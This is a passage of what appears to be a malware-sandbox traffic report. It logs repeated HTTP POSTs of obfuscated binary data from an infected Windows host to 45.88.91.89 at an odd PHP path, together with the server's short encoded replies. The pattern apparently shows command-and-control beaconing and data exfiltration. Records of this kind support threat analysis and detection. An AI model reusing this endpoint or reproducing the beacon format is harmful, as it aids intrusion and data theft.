                                                      Data Ascii: VU]SVZUP[_RUY]WZW]_]PRVX_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[".<$$X'U+,+$W3Y<'4'8>4T41=6%>X/-$[' \,6
                                                      Dec 13, 2024 14:34:19.346435070 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:34:19.581126928 CET200INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:34:19 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      79192.168.2.65006445.88.91.8980
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:34:18.311486959 CET309OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 1456
                                                      Expect: 100-continue
                                                      Dec 13, 2024 14:34:18.657241106 CET1456OUTData Raw: 56 54 5d 58 56 5a 50 52 5b 5f 52 55 59 5e 57 58 57 5f 5f 5d 50 5e 56 5c 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: VT]XVZPR[_RUY^WXW__]P^V\_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[":0'.?T+ %/(3?$(403;=X"",&>5$;=$[' \,
                                                      Dec 13, 2024 14:34:19.396612883 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:34:19.632977009 CET349INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:34:19 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 39 38 0d 0a 00 1a 24 00 3f 39 0e 0d 27 2b 2c 51 25 3d 2a 02 3e 01 36 07 39 2f 34 12 26 34 2b 1c 2b 1d 00 50 3e 1d 37 5f 3e 0d 3d 5d 34 01 3f 0e 2c 36 2f 5f 0d 11 3b 07 23 3e 36 12 2c 03 2f 5c 3d 3e 2a 01 3f 11 36 00 28 2e 30 5c 33 38 32 1f 26 2d 0f 08 29 29 30 0e 29 2b 38 19 2e 2c 07 58 25 1f 2f 57 0d 1e 24 0a 3c 32 2a 06 37 28 23 05 36 2d 29 5f 3e 24 26 56 21 07 2b 5a 25 2d 26 04 27 2c 0d 0e 37 55 23 01 31 30 20 0e 30 17 34 0b 26 2f 2e 50 2a 00 29 51 0f 32 54 54 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 98$?9'+,Q%=*>69/4&4++P>7_>=]4?,6/_;#>6,/\=>*?6(.0\382&-))0)+8.,X%/W$<2*7(#6-)_>$&V!+Z%-&',7U#10 04&/.P*)Q2TT0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      80192.168.2.65006945.88.91.8980
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:34:19.827079058 CET309OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Dec 13, 2024 14:34:20.172736883 CET2568OUTData Raw: 53 52 58 5c 56 58 50 55 5b 5f 52 55 59 5c 57 5c 57 59 5f 5f 50 53 56 59 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: SRX\VXPU[_RUY\W\WY__PSVY_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[!.<(3. >/+%<,U'<(?^'+- !?_$>%C';8$[' \,2
                                                      Dec 13, 2024 14:34:20.929460049 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:34:21.165213108 CET200INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:34:20 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      81192.168.2.65007345.88.91.8980
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:34:21.400960922 CET333OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:34:21.750854015 CET2568OUTData Raw: 53 55 5d 5c 53 5b 55 55 5b 5f 52 55 59 5b 57 5a 57 5f 5f 5b 50 58 56 52 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: SU]\S[UU[_RUY[WZW__[PXVR_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[!Z./ $+</?0<7%,(47389^42'.+-=$[' \,.
                                                      Dec 13, 2024 14:34:22.569737911 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:34:22.793204069 CET200INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:34:22 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      82192.168.2.65007645.88.91.8980
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:34:23.039093971 CET333OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2564
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:34:23.391490936 CET2564OUTData Raw: 56 5b 58 58 53 58 50 52 5b 5f 52 55 59 59 57 58 57 59 5f 5b 50 5a 56 5a 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: V[XXSXPR[_RUYYWXWY_[PZVZ_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[!,<40+W><Z%,+$<]<'<3+)Y#'Z$-"3 ^8$[' \,*
                                                      Dec 13, 2024 14:34:24.149754047 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:34:24.385487080 CET200INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:34:24 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      83192.168.2.65007745.88.91.8980
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:34:24.634208918 CET333OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      84192.168.2.65007845.88.91.8980
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:34:24.762093067 CET333OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 1428
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:34:25.110404968 CET1428OUTData Raw: 56 50 5d 52 56 5a 50 53 5b 5f 52 55 59 5d 57 5a 57 5c 5f 53 50 5a 56 5a 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: VP]RVZPS[_RUY]WZW\_SPZVZ_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[!Z9<7$3T<8$/7$?+_+#'89Z 1/$>>0./$[' \,6
                                                      Dec 13, 2024 14:34:25.852176905 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:34:26.085760117 CET349INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:34:25 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 39 38 0d 0a 00 1a 27 58 28 07 28 0b 32 28 2c 51 24 2d 26 02 3d 11 21 58 2e 11 2f 03 27 1a 20 09 3f 23 26 1c 3e 34 37 12 2a 1d 29 11 23 01 20 1c 2e 1c 2f 5f 0d 11 3b 07 23 00 36 5d 38 04 30 00 29 3e 31 5f 3f 01 36 00 29 58 23 04 24 28 39 0f 26 13 32 51 28 00 23 57 3c 28 38 16 2e 2f 2e 05 25 0f 2f 57 0d 1e 27 19 29 22 2a 03 20 2b 24 5f 21 04 36 03 2a 37 3d 0d 21 29 23 10 31 00 3d 5e 25 02 3c 52 34 0d 0d 03 25 55 37 1d 27 39 2b 1c 24 2f 2e 50 2a 00 29 51 0f 32 54 54 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 98'X((2(,Q$-&=!X./' ?#&>47*)# ./_;#6]80)>1_?6)X#$(9&2Q(#W<(8./.%/W')"* +$_!6*7=!)#1=^%<R4%U7'9+$/.P*)Q2TT0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      85192.168.2.65007945.88.91.8980
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:34:24.953876972 CET333OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2564
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:34:25.297841072 CET2564OUTData Raw: 53 57 58 5c 56 5f 50 50 5b 5f 52 55 59 59 57 58 57 53 5f 5c 50 59 56 53 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: SWX\V_PP[_RUYYWXWS_\PYVS_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[",,\$-;>?+'/73?'<43(*"!02!C'X,8-$[' \,*
                                                      Dec 13, 2024 14:34:26.045969963 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:34:26.315097094 CET200INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:34:25 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      86192.168.2.65008045.88.91.8980
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:34:26.557954073 CET309OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Dec 13, 2024 14:34:26.907764912 CET2568OUTData Raw: 56 54 58 58 53 59 55 55 5b 5f 52 55 59 5b 57 5b 57 5b 5f 5c 50 5d 56 5d 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: VTXXSYUU[_RUY[W[W[_\P]V]_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[!Z. 3$?'$?/%/8+$(*7/[1%C3,$[' \,.
                                                      Dec 13, 2024 14:34:27.643755913 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:34:27.877628088 CET200INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:34:27 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      87192.168.2.65008145.88.91.8980
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:34:28.120980024 CET333OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:34:28.469629049 CET2568OUTData Raw: 53 50 58 5b 53 5e 55 53 5b 5f 52 55 59 5f 57 5e 57 59 5f 5e 50 58 56 52 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: SPX[S^US[_RUY_W^WY_^PXVR_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[":?Z$>((<$0<S'<3?$$8)_#,2X%@0-?8-$[' \,>
                                                      Dec 13, 2024 14:34:29.220496893 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:34:29.456084967 CET200INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:34:29 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      88192.168.2.65008245.88.91.8980
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:34:29.697690964 CET333OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:34:30.047861099 CET2568OUTData Raw: 53 50 58 5c 53 59 55 53 5b 5f 52 55 59 50 57 5e 57 5d 5f 5e 50 59 56 5b 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: SPX\SYUS[_RUYPW^W]_^PYV[_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[!9,#3>?R<<83($,+?$[$&42$&&',-=$[' \,
                                                      Dec 13, 2024 14:34:30.791728020 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:34:31.025721073 CET200INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:34:30 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      89192.168.2.65008445.88.91.8980
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:34:31.283363104 CET333OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:34:31.641500950 CET2568OUTData Raw: 53 50 58 5e 56 5a 55 54 5b 5f 52 55 59 5e 57 58 57 53 5f 59 50 5b 56 52 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: SPX^VZUT[_RUY^WXWS_YP[VR_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[!^:3$? %?0R'7X<$;^$8* !32=*'=?;=$[' \,
                                                      Dec 13, 2024 14:34:32.369484901 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:34:32.601299047 CET200INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:34:32 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      90192.168.2.65008545.88.91.8980
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:34:32.843421936 CET309OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Dec 13, 2024 14:34:33.188437939 CET2568OUTData Raw: 56 5b 5d 52 53 5b 50 57 5b 5f 52 55 59 51 57 58 57 5a 5f 53 50 58 56 5d 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: V[]RS[PW[_RUYQWXWZ_SPXV]_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[".Z#$<>/8Z0/ V0/<(;^&;Y 'X$.6%><,$[' \,
                                                      Dec 13, 2024 14:34:33.953708887 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:34:34.189742088 CET200INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:34:33 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      91192.168.2.65008645.88.91.8980
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:34:34.430922985 CET333OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:34:34.782191038 CET2568OUTData Raw: 56 57 5d 5e 56 5d 55 50 5b 5f 52 55 59 5e 57 53 57 52 5f 53 50 5a 56 58 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: VW]^V]UP[_RUY^WSWR_SPZVX_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX["9?,0=,<,73%,']?;$%#?%.G3+,$[' \,
                                                      Dec 13, 2024 14:34:35.520663023 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:34:35.754110098 CET200INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:34:35 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      92192.168.2.65008745.88.91.8980
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:34:35.997534990 CET333OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      93192.168.2.65008845.88.91.8980
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:34:36.309722900 CET333OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 1456
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
